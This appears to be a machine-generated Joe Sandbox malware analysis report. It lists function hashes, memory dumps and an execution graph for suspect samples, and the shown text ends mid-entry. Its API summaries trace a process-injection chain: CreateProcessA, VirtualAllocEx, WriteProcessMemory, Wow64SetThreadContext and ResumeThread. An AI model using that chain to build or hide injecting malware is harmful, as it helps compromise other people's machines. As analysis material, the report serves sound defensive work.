                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d315a8acbac8b85ddd0b103f4de4a9c10b5b0a1b73a57f760bdec0a50068cf4b
                          • Instruction ID: b1f2f01eb222a3ac1ea827287ccf42d144fdd6b6a9dab5041b343045f5355b66
                          • Opcode Fuzzy Hash: d315a8acbac8b85ddd0b103f4de4a9c10b5b0a1b73a57f760bdec0a50068cf4b
                          • Instruction Fuzzy Hash: 73E1F475E102198FDB14CFA9C580AAEFBB2FF89305F248169E414AB355D731AD42CFA1
                          Function 08EEBE08 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6803b1578e5eda0babfd039552faf95773ead0ae3b536a1b4498ef6b7de3408a
                          • Instruction ID: 15659e0c5b1ef65b06cf7f3efa2a9f706640aa2d4e53a01135a25a47c62d86ee
                          • Opcode Fuzzy Hash: 6803b1578e5eda0babfd039552faf95773ead0ae3b536a1b4498ef6b7de3408a
                          • Instruction Fuzzy Hash: B3E1F775E002198FDB14CFA9D580AAEFBB2FF89305F248169E454AB355D734AD42CFA0
                          Function 08EEC240 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1dbe39928261234ab2523832268f92d05b19138ba2df7743cc4947c6db3c8bad
                          • Instruction ID: 1241103d1e454bb62dcd0df666176a37d86c4e39c9938de1798e502f000aec54
                          • Opcode Fuzzy Hash: 1dbe39928261234ab2523832268f92d05b19138ba2df7743cc4947c6db3c8bad
                          • Instruction Fuzzy Hash: 20E1F875E102198FDB14CFA9C580AAEFBB2FF89305F249169E414AB355D734AD42CFA0
                          Function 08EEA760 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 83cea18f98e1df03156e22ee798e1367fc55aada756d4130c229c72b4b5ba756
                          • Instruction ID: 791bc64c15c7e659a15869ae4e6ee8a32a3578e51c52c085cb762592f6a8c284
                          • Opcode Fuzzy Hash: 83cea18f98e1df03156e22ee798e1367fc55aada756d4130c229c72b4b5ba756
                          • Instruction Fuzzy Hash: 81E1F574E002298FDB14CFA9D584AAEFBB2FF89305F248169E414AB355D735AD42CF60
                          Function 08D45E48 Relevance: .3, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dc7fbec9fcf6b0bdc948054c8273e9883b48d4c5a941ec59315b5aed4a8a70f0
                          • Instruction ID: 5865593d3d12734c36a4a1e14071cb7358e49a1c75ba7c84587abf0b6fff7aee
                          • Opcode Fuzzy Hash: dc7fbec9fcf6b0bdc948054c8273e9883b48d4c5a941ec59315b5aed4a8a70f0
                          • Instruction Fuzzy Hash: C3C17CB4B002018FE714DF64D49866EBBF2EFC9201F598669D44A9B396DF30EC468B91
                          Function 0313E22C Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef3fd23f998e764b2d67486fba7ed4be899404173e032056a6e77f56fdf3fc69
                          • Instruction ID: 5ad721e0b146bb0dfbba9905370b13f5ea4b7ba73ae852968ff2dde485d7dd1f
                          • Opcode Fuzzy Hash: ef3fd23f998e764b2d67486fba7ed4be899404173e032056a6e77f56fdf3fc69
                          • Instruction Fuzzy Hash: 1AA14E36E00315CFCF09DFB5C84459EBBB2FF8A300B1985AAE805AB265DB71D956CB50
                          Function 08D49598 Relevance: 6.5, Strings: 5, Instructions: 204COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: ?$B$B$C$C
                          • API String ID: 0-1150723364
                          • Opcode ID: cfd635e3541334690537a92a09406b4d1e70203830985d561502e81879213086
                          • Instruction ID: 54ce97fa03e7399f1735f6db9cdd1da338228d787abee1ffeaed51438769c91b
                          • Opcode Fuzzy Hash: cfd635e3541334690537a92a09406b4d1e70203830985d561502e81879213086
                          • Instruction Fuzzy Hash: 0A819D75E00218DFCB14DFA5C4949AEBFF2BF89210F14965ED40A6B361DB30A906CB91

                          Execution Graph

                          Execution Coverage:10.2%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:152
                          Total number of Limit Nodes:8
                          execution_graph 52840 749db2a 52841 749db37 52840->52841 52846 749f040 52841->52846 52859 749f0b6 52841->52859 52873 749f050 52841->52873 52842 749dafb 52847 749f044 52846->52847 52848 749f072 52847->52848 52886 75a049b 52847->52886 52891 75a08f7 52847->52891 52895 75a02d1 52847->52895 52899 75a05b1 52847->52899 52904 75a0283 52847->52904 52908 75a0862 52847->52908 52913 75a0432 52847->52913 52919 75a014f 52847->52919 52923 75a050e 52847->52923 52928 75a02be 52847->52928 52848->52842 52860 749f044 52859->52860 52862 749f0b9 52859->52862 52861 749f072 52860->52861 52863 75a049b 2 API calls 52860->52863 52864 75a02be 2 API calls 52860->52864 52865 75a050e 2 API calls 52860->52865 52866 75a014f 2 API calls 52860->52866 52867 75a0432 4 API calls 52860->52867 52868 75a0862 2 API calls 52860->52868 52869 75a0283 2 API calls 52860->52869 52870 75a05b1 2 API calls 52860->52870 52871 75a02d1 2 API calls 52860->52871 52872 75a08f7 2 API calls 52860->52872 52861->52842 52862->52842 52863->52861 52864->52861 52865->52861 52866->52861 52867->52861 52868->52861 52869->52861 52870->52861 52871->52861 52872->52861 52874 749f06a 52873->52874 52875 749f072 52874->52875 52876 75a049b 2 API calls 52874->52876 52877 75a02be 2 API calls 52874->52877 52878 75a050e 2 API calls 52874->52878 52879 75a014f 2 API calls 52874->52879 52880 75a0432 4 API calls 52874->52880 52881 75a0862 2 API calls 52874->52881 52882 75a0283 2 API calls 52874->52882 52883 75a05b1 2 API calls 52874->52883 52884 75a02d1 2 API calls 52874->52884 52885 75a08f7 2 API calls 52874->52885 52875->52842 52876->52875 52877->52875 52878->52875 52879->52875 52880->52875 52881->52875 52882->52875 52883->52875 52884->52875 52885->52875 52887 75a04a1 52886->52887 52933 749ca68 52887->52933 52937 749ca60 52887->52937 52888 75a04ce 52892 75a092d 52891->52892 52941 749d0e8 52891->52941 52945 749d0e0 52891->52945 52949 749d1d8 52895->52949 52953 749d1d0 52895->52953 52896 75a02f3 52896->52848 52900 75a05d4 52899->52900 52902 749d0e8 WriteProcessMemory 52900->52902 52903 749d0e0 WriteProcessMemory 52900->52903 52901 75a092d 52902->52901 52903->52901 52957 749cb18 52904->52957 52961 749cb10 52904->52961 52905 75a02a2 52905->52848 52909 75a09b7 52908->52909 52911 749d0e8 WriteProcessMemory 52909->52911 52912 749d0e0 WriteProcessMemory 52909->52912 52910 75a0a97 52911->52910 52912->52910 52965 749d028 52913->52965 52969 749d020 52913->52969 52914 75a0450 52917 749d0e8 WriteProcessMemory 52914->52917 52918 749d0e0 WriteProcessMemory 52914->52918 52917->52914 52918->52914 52973 749d370 52919->52973 52977 749d365 52919->52977 52925 75a01b2 52923->52925 52924 75a01c4 52924->52848 52925->52923 52925->52924 52926 749cb18 Wow64SetThreadContext 52925->52926 52927 749cb10 Wow64SetThreadContext 52925->52927 52926->52925 52927->52925 52929 75a02cb 52928->52929 52931 749ca68 ResumeThread 52929->52931 52932 749ca60 ResumeThread 52929->52932 52930 75a04ce 52931->52930 52932->52930 52934 749caa8 ResumeThread 52933->52934 52936 749cad9 52934->52936 52936->52888 52938 749cab5 ResumeThread 52937->52938 52939 749ca67 52937->52939 52940 749cad9 52938->52940 52939->52938 52940->52888 52942 749d130 WriteProcessMemory 52941->52942 52944 749d187 52942->52944 52944->52892 52946 749d0e7 WriteProcessMemory 52945->52946 52948 749d187 52946->52948 52948->52892 52950 749d223 ReadProcessMemory 52949->52950 52952 749d267 52950->52952 52952->52896 52954 749d1d8 ReadProcessMemory 52953->52954 52956 749d267 52954->52956 52956->52896 52958 749cb5d Wow64SetThreadContext 52957->52958 52960 749cba5 52958->52960 52960->52905 52962 749cb17 Wow64SetThreadContext 52961->52962 52964 749cba5 52962->52964 52964->52905 52966 749d068 VirtualAllocEx 52965->52966 52968 749d0a5 52966->52968 52968->52914 52970 749d068 VirtualAllocEx 52969->52970 52972 749d0a5 52970->52972 52972->52914 52974 749d3f9 CreateProcessA 52973->52974 52976 749d5bb 52974->52976 52978 749d370 CreateProcessA 52977->52978 52980 749d5bb 52978->52980 52807 144d6c0 52808 144d706 GetCurrentProcess 52807->52808 52810 144d751 52808->52810 52811 144d758 GetCurrentThread 52808->52811 52810->52811 52812 144d795 GetCurrentProcess 52811->52812 52813 144d78e 52811->52813 52814 144d7cb 52812->52814 52813->52812 52815 144d7f3 GetCurrentThreadId 52814->52815 52816 144d824 52815->52816 53001 144b330 53002 144b33f 53001->53002 53004 144b417 53001->53004 53005 144b45c 53004->53005 53006 144b439 53004->53006 53005->53002 53006->53005 53007 144b660 GetModuleHandleW 53006->53007 53008 144b68d 53007->53008 53008->53002 52981 555a2b2 52982 555a240 DrawTextExW 52981->52982 52983 555a2ba 52981->52983 52985 555a286 52982->52985 52817 1444668 52818 144467a 52817->52818 52819 1444686 52818->52819 52821 1444779 52818->52821 52822 144479d 52821->52822 52826 1444878 52822->52826 52830 1444888 52822->52830 52827 1444888 52826->52827 52828 144498c 52827->52828 52834 14444b0 52827->52834 52831 14448af 52830->52831 52832 144498c 52831->52832 52833 14444b0 CreateActCtxA 52831->52833 52833->52832 52835 1445918 CreateActCtxA 52834->52835 52837 14459db 52835->52837 52838 144d908 DuplicateHandle 52839 144d99e 52838->52839 52986 72febc0 52987 72febe6 52986->52987 52988 72fec40 52987->52988 52990 75a0ea1 52987->52990 52991 75a0ec1 52990->52991 52992 75a0ef7 52991->52992 52995 75a1198 PostMessageW 52991->52995 52997 75a1191 52991->52997 52992->52988 52996 75a1204 52995->52996 52996->52991 52998 75a1197 PostMessageW 52997->52998 53000 75a1204 52998->53000 53000->52991

                          Executed Functions

                          Function 0144D6B0 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 288 144d6b0-144d74f GetCurrentProcess 292 144d751-144d757 288->292 293 144d758-144d78c GetCurrentThread 288->293 292->293 294 144d795-144d7c9 GetCurrentProcess 293->294 295 144d78e-144d794 293->295 297 144d7d2-144d7ed call 144d890 294->297 298 144d7cb-144d7d1 294->298 295->294 301 144d7f3-144d822 GetCurrentThreadId 297->301 298->297 302 144d824-144d82a 301->302 303 144d82b-144d88d 301->303 302->303
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0144D73E
                          • GetCurrentThread.KERNEL32 ref: 0144D77B
                          • GetCurrentProcess.KERNEL32 ref: 0144D7B8
                          • GetCurrentThreadId.KERNEL32 ref: 0144D811
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 11feab83a76eaeb64e46b7365e7f68ce1ad766d8ab9f8346ff6d4ec3c3e29d65
                          • Instruction ID: e8d2a65f4bb2e5d35df95f34e3250567d3e90a4a26ac244439b1b9de7759fee7
                          • Opcode Fuzzy Hash: 11feab83a76eaeb64e46b7365e7f68ce1ad766d8ab9f8346ff6d4ec3c3e29d65
                          • Instruction Fuzzy Hash: C15197B0D013498FEB14DFAAD949BAEBBF1EF48314F20845AE419A73A0D7345845CF65
                          Function 0144D6C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 310 144d6c0-144d74f GetCurrentProcess 314 144d751-144d757 310->314 315 144d758-144d78c GetCurrentThread 310->315 314->315 316 144d795-144d7c9 GetCurrentProcess 315->316 317 144d78e-144d794 315->317 319 144d7d2-144d7ed call 144d890 316->319 320 144d7cb-144d7d1 316->320 317->316 323 144d7f3-144d822 GetCurrentThreadId 319->323 320->319 324 144d824-144d82a 323->324 325 144d82b-144d88d 323->325 324->325
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0144D73E
                          • GetCurrentThread.KERNEL32 ref: 0144D77B
                          • GetCurrentProcess.KERNEL32 ref: 0144D7B8
                          • GetCurrentThreadId.KERNEL32 ref: 0144D811
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 8b0e5571db070313a107f1ef2e32314ce638875cfe23e267a53f498a87839240
                          • Instruction ID: 9d1a9d3765928a9646dce30ec704d8fc54890ead0bc6f2a4fc95d0280e1999e5
                          • Opcode Fuzzy Hash: 8b0e5571db070313a107f1ef2e32314ce638875cfe23e267a53f498a87839240
                          • Instruction Fuzzy Hash: 745177B0D013498FEB14DFAAD549BAEBBF1EF88314F208459E419A73A0D7346845CF65
                          Function 0749D365 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 788 749d365-749d405 791 749d43e-749d45e 788->791 792 749d407-749d411 788->792 799 749d460-749d46a 791->799 800 749d497-749d4c6 791->800 792->791 793 749d413-749d415 792->793 794 749d438-749d43b 793->794 795 749d417-749d421 793->795 794->791 797 749d423 795->797 798 749d425-749d434 795->798 797->798 798->798 801 749d436 798->801 799->800 802 749d46c-749d46e 799->802 808 749d4c8-749d4d2 800->808 809 749d4ff-749d5b9 CreateProcessA 800->809 801->794 804 749d491-749d494 802->804 805 749d470-749d47a 802->805 804->800 806 749d47c 805->806 807 749d47e-749d48d 805->807 806->807 807->807 810 749d48f 807->810 808->809 811 749d4d4-749d4d6 808->811 820 749d5bb-749d5c1 809->820 821 749d5c2-749d648 809->821 810->804 813 749d4f9-749d4fc 811->813 814 749d4d8-749d4e2 811->814 813->809 815 749d4e4 814->815 816 749d4e6-749d4f5 814->816 815->816 816->816 818 749d4f7 816->818 818->813 820->821 831 749d658-749d65c 821->831 832 749d64a-749d64e 821->832 834 749d66c-749d670 831->834 835 749d65e-749d662 831->835 832->831 833 749d650 832->833 833->831 836 749d680-749d684 834->836 837 749d672-749d676 834->837 835->834 838 749d664 835->838 840 749d696-749d69d 836->840 841 749d686-749d68c 836->841 837->836 839 749d678 837->839 838->834 839->836 842 749d69f-749d6ae 840->842 843 749d6b4 840->843 841->840 842->843 845 749d6b5 843->845 845->845
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D5A6
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: ad4dd28d7bf2b89941a10296b48474288f25c809ddb793a0bd6a4bb5f78e2adf
                          • Instruction ID: 56c518dd4ef6de6515be09b89a4f158aeb34bbbf92dfe20260c1b41cced9419e
                          • Opcode Fuzzy Hash: ad4dd28d7bf2b89941a10296b48474288f25c809ddb793a0bd6a4bb5f78e2adf
                          • Instruction Fuzzy Hash: 75A15EB1E0071A8FEF24CF68C9417DEBBB2BF44314F1485AAD808A7250DB759985CF91
                          Function 0749D370 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 846 749d370-749d405 848 749d43e-749d45e 846->848 849 749d407-749d411 846->849 856 749d460-749d46a 848->856 857 749d497-749d4c6 848->857 849->848 850 749d413-749d415 849->850 851 749d438-749d43b 850->851 852 749d417-749d421 850->852 851->848 854 749d423 852->854 855 749d425-749d434 852->855 854->855 855->855 858 749d436 855->858 856->857 859 749d46c-749d46e 856->859 865 749d4c8-749d4d2 857->865 866 749d4ff-749d5b9 CreateProcessA 857->866 858->851 861 749d491-749d494 859->861 862 749d470-749d47a 859->862 861->857 863 749d47c 862->863 864 749d47e-749d48d 862->864 863->864 864->864 867 749d48f 864->867 865->866 868 749d4d4-749d4d6 865->868 877 749d5bb-749d5c1 866->877 878 749d5c2-749d648 866->878 867->861 870 749d4f9-749d4fc 868->870 871 749d4d8-749d4e2 868->871 870->866 872 749d4e4 871->872 873 749d4e6-749d4f5 871->873 872->873 873->873 875 749d4f7 873->875 875->870 877->878 888 749d658-749d65c 878->888 889 749d64a-749d64e 878->889 891 749d66c-749d670 888->891 892 749d65e-749d662 888->892 889->888 890 749d650 889->890 890->888 893 749d680-749d684 891->893 894 749d672-749d676 891->894 892->891 895 749d664 892->895 897 749d696-749d69d 893->897 898 749d686-749d68c 893->898 894->893 896 749d678 894->896 895->891 896->893 899 749d69f-749d6ae 897->899 900 749d6b4 897->900 898->897 899->900 902 749d6b5 900->902 902->902
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D5A6
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 952a15fa64dc0843c9ebe271b553cd6ba063c24b56be057db128100de879c030
                          • Instruction ID: 8f26954304f66408fb53ca0f30085ccc77c050896b885503bf0faf1c105531cf
                          • Opcode Fuzzy Hash: 952a15fa64dc0843c9ebe271b553cd6ba063c24b56be057db128100de879c030
                          • Instruction Fuzzy Hash: A8915EB1E0071A8FEF24CF69C8417DEBBB2BF48310F1485AAD808A7240DB759985CF91
                          Function 0144B417 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0144B67E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 652b2081af6bbe55679e621d6f4093d2fe3e58c5393936ee053dcfa7d6ff8324
                          • Instruction ID: 0701986d246755ff8cc47d22aaca377a3872072ddf0e4d915f96fb58fd389637
                          • Opcode Fuzzy Hash: 652b2081af6bbe55679e621d6f4093d2fe3e58c5393936ee053dcfa7d6ff8324
                          • Instruction Fuzzy Hash: DD812370A00B058FE725DF2AD45576ABBF1FF88204F00892ED49ADBB60D774E946CB91
                          Function 0144590D Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 014459C9
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 30d8ef21b93c2e84e466aa08e439a5f647ce7e4fd9d911f15302ef68aa87a8ae
                          • Instruction ID: c8891f10136495309b787713f5ea9ab244f822faf711df2e3b413c6330f2f62d
                          • Opcode Fuzzy Hash: 30d8ef21b93c2e84e466aa08e439a5f647ce7e4fd9d911f15302ef68aa87a8ae
                          • Instruction Fuzzy Hash: 1741D0B1C40719CBEF24DFAAC884BDEBBB5BF49314F20816AD408AB261DB755946CF50
                          Function 014444B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 014459C9
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: c5ab797eae12a876f8f2a139696e53ad4f0a37aba0ae05791cdfb5cf44b60572
                          • Instruction ID: 0bc87d8ba7b60681705efc6d64eea603283b04c2a975d3ef983e0543511182e3
                          • Opcode Fuzzy Hash: c5ab797eae12a876f8f2a139696e53ad4f0a37aba0ae05791cdfb5cf44b60572
                          • Instruction Fuzzy Hash: 1A41D271C0071DCBEB24DFAAC84478EBBB5BF49314F20816AD408AB261DB756946CF90
                          Function 0749D0E0 Relevance: 1.6, APIs: 1, Instructions: 79injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D178
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: d76070c144a44e1744ee18dd9e3d183f2f2b535ea18ba6bc5cfe2a6a1efaa844
                          • Instruction ID: 7c7cd7b8ff8338745c55ec49a47e49600a170ab40b24b88a5a3d46093faa78d7
                          • Opcode Fuzzy Hash: d76070c144a44e1744ee18dd9e3d183f2f2b535ea18ba6bc5cfe2a6a1efaa844
                          • Instruction Fuzzy Hash: 873147B2D003499FDB10DFA9D881BEEBFF5FB48314F14842AE958A7241D7799541CBA0
                          Function 0555A1D8 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0555A277
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1389981190.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_5550000_RTdozXra.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: e1cf3acf5ce8d8799693c029d331d986676509c20bc3fd437c4711b84e05c0b5
                          • Instruction ID: 4f48ff2f818bbb3a7cf065740aef5adc20d397d06b195dcb8ddc3cb9843faeae
                          • Opcode Fuzzy Hash: e1cf3acf5ce8d8799693c029d331d986676509c20bc3fd437c4711b84e05c0b5
                          • Instruction Fuzzy Hash: E33100B5D0034A9FDB10CF9AD884A9EFBF4FB48320F54852AE819A7210D775A945CFA0
                          Function 0749CB10 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0749CB96
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 8d1e548b22e47d3c4c8ec0aae496f6b60a83059fbe06300c52fe21c772074888
                          • Instruction ID: 9c0d97ffaec85402215b996a7a3e34a02dfd048004c43a70f5a005cbb7728c0e
                          • Opcode Fuzzy Hash: 8d1e548b22e47d3c4c8ec0aae496f6b60a83059fbe06300c52fe21c772074888
                          • Instruction Fuzzy Hash: CC2148B1D003098FDB10DFAAD885BEEBFF4EB48224F54842AD419A7240DB789945CFA4
                          Function 0749D1D0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D258
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 36426f343ca6b15dcbf9ee18f69dfb8b1a24a88475812068d563903577d81e00
                          • Instruction ID: fb8eda4ca2a80abe9344e35ad4860e7d2b647a093bc255f6502cd0f5ecbbe634
                          • Opcode Fuzzy Hash: 36426f343ca6b15dcbf9ee18f69dfb8b1a24a88475812068d563903577d81e00
                          • Instruction Fuzzy Hash: B821F6B1D003599FDB10DFAAD841BEEBBF5FF48310F50842AE918A7240D7399541CBA5
                          Function 0749D0E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D178
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1393692821.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7490000_RTdozXra.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 5af8ed22c12df2ccef234a960ff7b90e1cd15013f6cd7dbe729a62d58e3c3c86
                          • Instruction ID: 1a64208592a37d38508cdc5736b20ee786ecd6045491f36404f341975a9bff04
                          • Opcode Fuzzy Hash: 5af8ed22c12df2ccef234a960ff7b90e1cd15013f6cd7dbe729a62d58e3c3c86
                          • Instruction Fuzzy Hash: 562113B2D003499FDB10DFAAC881BDEBBF5FB48310F50842AE918A7240D7799941CBA4
                          Function 0555A1E0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0555A277
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1389981190.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_5550000_RTdozXra.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 034e933f74dc6a9832d5e6adbcec295b82d3380091cce807e0aff031b65bbb0f
                          • Instruction ID: c618178e72ce0de2fa792946359c5443c5ec548ef9dc2850842471b5de385c55
                          • Opcode Fuzzy Hash: 034e933f74dc6a9832d5e6adbcec295b82d3380091cce807e0aff031b65bbb0f
                          • Instruction Fuzzy Hash: CB21EEB5D003099FDB10CF9AD880A9EFBF5FB48320F54842AE819A7210D775A945CFA0
                          Function 0144D900 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0144D98F
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1377080693.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_1440000_RTdozXra.jbxd
                          Similarity
